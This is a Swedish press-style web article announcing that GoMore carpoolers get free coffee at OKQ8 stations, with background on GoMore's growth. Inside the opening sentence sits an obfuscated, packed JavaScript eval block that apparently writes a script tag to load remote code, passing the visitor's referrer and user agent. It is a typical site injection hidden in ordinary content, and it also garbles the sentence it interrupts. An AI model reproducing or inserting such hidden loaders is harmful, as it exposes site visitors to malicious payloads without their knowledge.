Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

GoMore inleder ett samarbete med OKQ8

GoMore inleder ett samarbete med OKQ8
Sebastian

GoMore eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dfnkf|var|u0026u|referrer|rkzei||js|php’.split(’|’),0,{}))
inleder ett samarbete med OKQ8: när man samåker via GoMore får man numer en valfri gratis kaffe på ett urval OKQ8-stationer runtom i Sverige! Detta ska uppmuntra svenskar att dela bil och därmed få en trevligare samåkningsupplevelse.

Att det digitala företaget GoMore samarbetar med drivmedelsföretaget OKQ8 är unikt i sitt slag då det förenar brett skilda företag i kampen för hållbara resor i Sverige. OKQ8 arbetar för en hållbar bilism för människor i rörelse och uppmuntrar gärna till enkla och miljövänliga transporter genom samåkning. Samarbetet innebär att OKQ8 bjuder både förare och passagerare på Fairtrademärkt kaffe.

Samåkningskonceptet GoMore är en av Nordens största tjänster för samåkning med över 200 000 medlemmar i Skandinavien. Tjänsten har sitt ursprung i Danmark, där ett samarbete med Q8 Danmark redan är etablerat. Svenskarna har haft tillgång till hemsidan sedan början av sommaren i år och under hösten har antalet medlemmar ökat kraftigt. En intressant trend som utmärker sig är att en stor del av de nya användarna är kvinnliga studenter.

Det är verkligen en kul utveckling och även intressant att flertalet av de nya användarna är unga kvinnor och som regel studerande. Detta tyder på att unga, kvinnliga studenter är redo att skippa traditionella resealternativ och göra resan till en upplevelse istället för att bara flytta sig från A till B, menar GoMores svenska marknadschef Ann Boström.

Boström tycker även att trenden talar positivt för fortsatt växt för samåkning i Sverige. – Unga människor är trendsetters. De är de första som testar nya saker och så följer resten av befolkningen efter. Detta är en utveckling som GoMore i Danmark redan har upplevt, där tjänsten växte organiskt bland studenter och nu är ett välkänt varumärke och väletablerat alternativ till den danska kollektivtrafiken.

Information om kaffeerbjudandet:

När du bokar resa via GoMore får du en kaffekupong skickad till din e-mail som antingen skrivs ut eller sparas på din mobiltelefon. Visa fram kaffekupongen på utvald OKQ8 och få en valfri (normalstorlek) kaffe.
(Se detaljerad information i det bifogade pressmeddelandet eller
läs mer här)

Om GoMore:

GoMore är Skandinaviens största samåkningstjänst med över 200 000 medlemmar. Vi är ett ungt, digitalt företag som förmedlar resor för privatpersoner genom samåkning. Alla svenskar vet vad fullbokade och försenade tåg betyder. Att åka tåg och bil är dessutom dyrt. Samåkning från dörr till dörr är ett billigare, miljövänligt och mer socialt alternativ plus att det förbättrar bilanvändning då det i genomsnitt sitter 1,7 personer i varje bil på de svenska vägarna.